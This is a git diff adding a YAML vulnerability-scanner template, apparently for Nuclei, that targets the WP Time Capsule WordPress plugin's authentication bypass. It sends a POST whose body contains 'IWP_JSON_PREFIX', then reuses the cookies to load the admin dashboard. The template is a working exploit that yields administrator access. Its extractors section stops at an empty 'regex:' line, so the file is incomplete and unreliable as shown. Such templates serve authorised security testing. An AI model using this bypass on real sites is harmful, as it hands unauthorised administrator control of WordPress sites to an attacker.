diff --git a/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml b/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
new file mode 100644
index 0000000000..1c2f3b4036
--- /dev/null
+++ b/vulnerabilities/wordpress/wordpress-auth-bypass-wptimecapsule.yaml
@@ -0,0 +1,49 @@
+id: wordpress-auth-bypass-wptimecapsule
+
+info:
+  name: WordPress WP Time Capsule Authentication Bypass
+  author: princechaddha
+  severity: critical
+  reference: https://github.com/SECFORCE/WPTimeCapsulePOC
+  tags: wordpress,auth-bypass,wp-plugin
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept: */*
+
+        IWP_JSON_PREFIX
+        
+      - |
+        GET /wp-admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept: */*
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<div id="adminmenumain" role="navigation" aria-label="Main menu">'
+          - "<h1>Dashboard</h1>"
+        part: body
+        condition: and
+
+      - type: word
+        words:
+          - 'text/html'
+        part: header
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
\ No newline at end of file